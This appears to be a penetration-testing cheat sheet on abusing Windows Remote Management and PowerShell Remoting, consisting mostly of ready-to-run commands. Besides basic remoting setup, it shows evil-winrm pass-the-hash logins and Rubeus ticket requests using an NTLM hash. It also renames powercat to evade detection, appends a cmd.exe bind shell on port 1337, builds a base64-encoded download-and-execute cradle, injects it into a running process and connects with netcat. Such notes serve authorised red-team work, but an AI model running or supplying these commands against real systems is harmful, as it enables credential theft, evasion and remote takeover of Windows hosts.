WinRM / PSRemoting

Windows Remote Management / PowerShell Remoting

Enable WinRM

Using PowerShell (takes ~1m to be applied):

PS > Enable-PSRemoting -Force
PS > Set-Item wsman:\localhost\client\trustedhosts * -Force

Remotely with CME:


From Windows

PS > winrm get winrm/config
PS > winrm set winrm/config/client '@{TrustedHosts="*"}'
PS > $sess = New-PSSession -ComputerName -Credential $cred
PS > Enter-PSSession -Session $sess
PS > Copy-Item .\file.txt -Destination "C:\users\administrator\music\" -ToSession $sess

From Linux


Basic syntax:

$ evil-winrm -u '[MEGACORP\]snovvcrash' -p 'Passw0rd!' -i -s `pwd` -e `pwd`
$ evil-winrm -u '[MEGACORP\]snovvcrash' -H fc525c9683e8fe067095ba2ddc971889 -i -s `pwd` -e `pwd`

Always use full username when authenticating as a domain user, because if there're 2 users sharing the same name (a local user and a domain user), say WORKGROUP\Administrator and MEGACORP\Administrator, and you're trying to authenticate as a domain admin without providing the domain prefix, authentication will fail.

Execute a .NET binary:

*Evil-WinRM* PS > Invoke-Binary Rubeus.exe "asktgt, /domain:megacorp.local, /user:snovvcrash, /rc4:fc525c9683e8fe067095ba2ddc971889, /nowrap"

Spawn interactive bind shell with powercat.ps1 and Invoke-PSInject.ps1:

$ sed -i s/powercat/pwcat/g pwcat.ps1
$ echo 'powercat -l -p 1337 -e cmd.exe' >> pwcat.ps1
$ echo 'IEX(New-Object Net.WebClient).DownloadString('''')' | iconv -t UTF-16LE | base64 -w0
*Evil-WinRM* PS > Get-Process
*Evil-WinRM* PS > Invoke-PSInject.ps1
*Evil-WinRM* PS > Invoke-PSInject -ProcId <PID> -PoshCode <BASE64_CMD>
$ rlwrap nc 1337


$ pwsh
PS > $sess = New-PSSession -ComputerName -Credential $cred -Authentication Negotiate
PS > Enter-PSSession -Session $sess

Last updated